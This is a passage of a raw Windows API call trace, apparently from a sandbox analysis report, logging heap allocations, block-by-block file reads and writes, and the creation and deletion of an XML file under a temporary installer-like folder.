Size=0x14) returned 0x5cac0 [0074.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.383] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0074.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0074.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0074.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.385] GetLastError () returned 0x0 [0074.385] SetLastError (dwErrCode=0x0) [0074.385] GetLastError () returned 0x0 [0074.386] SetLastError (dwErrCode=0x0) [0074.386] GetLastError () returned 0x0 [0074.386] SetLastError (dwErrCode=0x0) [0074.386] GetLastError () returned 0x0 [0074.386] SetLastError (dwErrCode=0x0) [0074.386] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.386] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.387] GetLastError () returned 0x0 [0074.387] SetLastError (dwErrCode=0x0) [0074.388] GetLastError () returned 0x0 [0074.388] SetLastError (dwErrCode=0x0) [0074.388] GetLastError () returned 0x0 [0074.388] SetLastError (dwErrCode=0x0) [0074.388] GetLastError () returned 0x0 [0074.388] SetLastError (dwErrCode=0x0) [0074.388] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.388] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.388] GetLastError () returned 0x0 [0074.388] SetLastError (dwErrCode=0x0) [0074.388] GetLastError () returned 0x0 [0074.388] SetLastError (dwErrCode=0x0) [0074.389] GetLastError () returned 0x0 [0074.389] SetLastError (dwErrCode=0x0) [0074.389] GetLastError () returned 0x0 [0074.389] SetLastError (dwErrCode=0x0) [0074.389] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.389] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.389] GetLastError () returned 0x0 [0074.389] SetLastError (dwErrCode=0x0) [0074.389] GetLastError () returned 0x0 [0074.389] SetLastError (dwErrCode=0x0) [0074.389] GetLastError () returned 0x0 [0074.389] SetLastError (dwErrCode=0x0) [0074.390] GetLastError () returned 0x0 [0074.390] SetLastError (dwErrCode=0x0) [0074.390] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.390] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.390] GetLastError () returned 0x0 [0074.390] SetLastError (dwErrCode=0x0) [0074.390] GetLastError () returned 0x0 [0074.390] SetLastError (dwErrCode=0x0) [0074.390] GetLastError () returned 0x0 [0074.390] SetLastError (dwErrCode=0x0) [0074.390] GetLastError () returned 0x0 [0074.390] SetLastError (dwErrCode=0x0) [0074.391] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.391] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] GetLastError () returned 0x0 [0074.391] SetLastError (dwErrCode=0x0) [0074.391] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.392] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.392] GetLastError () returned 0x0 [0074.392] SetLastError (dwErrCode=0x0) [0074.392] GetLastError () returned 0x0 [0074.392] SetLastError (dwErrCode=0x0) [0074.392] GetLastError () returned 0x0 [0074.392] SetLastError (dwErrCode=0x0) [0074.392] GetLastError () returned 0x0 [0074.392] SetLastError (dwErrCode=0x0) [0074.392] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.393] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.393] GetLastError () returned 0x0 [0074.393] SetLastError (dwErrCode=0x0) [0074.393] GetLastError () returned 0x0 [0074.393] SetLastError (dwErrCode=0x0) [0074.393] GetLastError () returned 0x0 [0074.393] SetLastError (dwErrCode=0x0) [0074.393] GetLastError () returned 0x0 [0074.393] SetLastError (dwErrCode=0x0) [0074.393] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0074.393] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.394] GetLastError () returned 0x0 [0074.394] SetLastError (dwErrCode=0x0) [0074.394] GetLastError () returned 0x0 [0074.394] SetLastError (dwErrCode=0x0) [0074.394] GetLastError () returned 0x0 [0074.394] SetLastError (dwErrCode=0x0) [0074.394] GetLastError () returned 0x0 [0074.394] SetLastError (dwErrCode=0x0) [0074.394] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x88a, lpOverlapped=0x0) returned 1 [0074.394] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0074.394] GetLastError () returned 0x0 [0074.395] SetLastError (dwErrCode=0x0) [0074.395] GetLastError () returned 0x0 [0074.395] SetLastError (dwErrCode=0x0) [0074.395] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0074.395] GetLastError () returned 0x0 [0074.395] SetLastError (dwErrCode=0x0) [0074.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d738 [0074.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0074.395] GetLastError () returned 0x0 [0074.395] SetLastError (dwErrCode=0x0) [0074.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0074.395] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x890, lpOverlapped=0x0) returned 1 [0074.395] GetLastError () returned 0x0 [0074.395] SetLastError (dwErrCode=0x0) [0074.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0074.396] GetLastError () returned 0x0 [0074.396] SetLastError (dwErrCode=0x0) [0074.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0074.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0074.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.396] CloseHandle (hObject=0x42c) returned 1 [0074.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.397] CloseHandle (hObject=0x410) returned 1 [0074.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0074.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0074.398] AreFileApisANSI () returned 1 [0074.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0074.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67900 [0074.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0074.398] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.399] GetFileType (hFile=0x410) returned 0x1 [0074.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.400] GetLastError () returned 0xb7 [0074.400] SetLastError (dwErrCode=0xb7) [0074.400] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0074.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.402] CloseHandle (hObject=0x410) returned 1 [0074.402] AreFileApisANSI () returned 1 [0074.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0074.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67540 [0074.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0074.402] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml")) returned 1 [0074.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.404] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f2, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧胐\x07̧비聐蜠\x08賂̧")) returned 0 [0074.404] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0074.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0074.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0074.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.405] AreFileApisANSI () returned 1 [0074.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics", lpUsedDefaultChar=0x0) returned 31 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.405] AreFileApisANSI () returned 1 [0074.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0074.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53298 [0074.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics") returned 31 [0074.406] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics" (normalized: "c:\\588bce7c90097ed212\\graphics"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.406] GetLastError () returned 0x5 [0074.406] GetLastError () returned 0x5 [0074.406] SetLastError (dwErrCode=0x5) [0074.406] GetLastError () returned 0x5 [0074.406] SetLastError (dwErrCode=0x5) [0074.406] GetLastError () returned 0x5 [0074.406] SetLastError (dwErrCode=0x5) [0074.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.406] AreFileApisANSI () returned 1 [0074.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0074.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53298 [0074.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics") returned 31 [0074.406] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics" (normalized: "c:\\588bce7c90097ed212\\graphics"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.406] GetLastError () returned 0x5 [0074.406] GetLastError () returned 0x5 [0074.406] SetLastError (dwErrCode=0x5) [0074.406] GetLastError () returned 0x5 [0074.406] SetLastError (dwErrCode=0x5) [0074.406] GetLastError () returned 0x5 [0074.406] SetLastError (dwErrCode=0x5) [0074.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.407] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 